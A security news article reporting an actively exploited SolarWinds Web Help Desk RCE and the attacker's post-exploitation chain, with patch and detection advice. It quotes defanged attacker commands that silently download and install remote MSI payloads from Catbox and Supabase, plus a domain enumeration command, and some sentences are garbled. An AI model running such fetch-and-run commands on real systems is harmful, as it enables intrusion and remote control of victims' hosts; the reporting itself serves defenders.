The SolarWinds Web Help Desk (WHD) has a remote code execution (RCE) vulnerability that is being actively exploited. Attackers are quickly using compromised instances to implement legitimate but widely misused administrative tools. Huntress has observed that SolarWinds Web Help Desk is currently running on 84 endpoints in 78 organizations within its partner base, highlighting the wide exposure surface.

Huntress noticed post-exploitation activity coming from a WHD service that had been compromised. Wrapper was the first in the attack chain.Java.exe, the underlying Tomcat-based application, is spawned by exe, the WHD service wrapper. The Java process then used cmd.exe to install a remote MSI payload in a silent manner: msiexec /q /i hxxps://files.catbox[. ]moe/tmp9fc.msi A Zoho ManageEngine RMM (Zoho Assist) agent staged through the Catbox file-hosting service was delivered by this payload.

Even though Zoho Assist is a valid remote management tool, its capacity to offer continuous, unattended access has made it a popular post-exploitation option. In this instance, instant interactive control was made possible by the agent's registration to a Zoho account under the attacker's control that was connected to a Proton Mail address. Microsoft's February 6 advisory, which confirmed the in-the-wild exploitation of SolarWinds WHD vulnerabilities for RCE and follow-on tooling deployment, is closely related to this activity.

Reconnaissance of Help Desk Attack Timelines and Lateral Movement The threat actor switched to hands-on-keyboard activity after the RMM agent became active.

They started Active Directory reconnaissance by using the Zoho RMM process (TOOLSIQ.EXE) as their execution context: net group "domain computers" /do An attacker can map domain-joined systems and rank targets using this enumeration step, which is a traditional prelude to lateral movement. The attacker used another silent MSI installer hosted on an attacker-controlled Supabase bucket to deploy Velociraptor, an open-source DFIR platform, shortly after reconnaissance: msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[. ]co/.../v4.msi Although Velociraptor is intended for defenders, when used improperly, its capacity to carry out commands, gather artifacts, and remotely control endpoints makes it a powerful command-and-control (C2) framework.

Velociraptor version 0.73.4, an out-of-date release with a known privilege escalation vulnerability that has surfaced in previous campaigns, was used in the deployment that was observed.

Previously linked to ToolShell exploitation and Warlock ransomware activity, the Velociraptor client interacted with attacker infrastructure housed behind a Cloudflare Worker (auth.qgtxtebl.workers[.]dev). The attacker quickly ran a series of base64-encoded PowerShell commands while Velociraptor was operating as a Windows service. These included installing Cloudflared from GitHub's official release channel right away after disabling Windows Defender and the Windows Firewall through registry changes.

By doing this, a backup tunnel-based access route was established, offering redundancy in the event that one C2 channel was interfered with. The use of Get-ComputerInfo to exfiltrate comprehensive system information and then push it straight into an Elastic Cloud deployment under the attacker's control using the Bulk API was one of the more noteworthy tradecraft decisions.

Ironically, the attacker used Elastic's own SIEM tools to create a centralized platform for victim management and triage. This campaign shows how easily attackers can use trusted tools that blend in with everyday administrative noise to go from a single management interface exposed to the internet to full interactive control, persistence, and enterprise-wide visibility. Version 2026.1 or later, which fixes CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551, is an urgent update for organizations using SolarWinds Web Help Desk.

In addition to rotating credentials and removing administrative interfaces from direct internet exposure, hosts should be examined for silent MSI installs, encoded PowerShell execution connected to WHD processes, and unauthorized remote access tools. Defenders should anticipate active scanning and rapid weaponization as exploitation spreads and react appropriately.

X, LinkedIn, and LinkedIn for daily ZeroOwl. To have your stories featured, get in touch with us.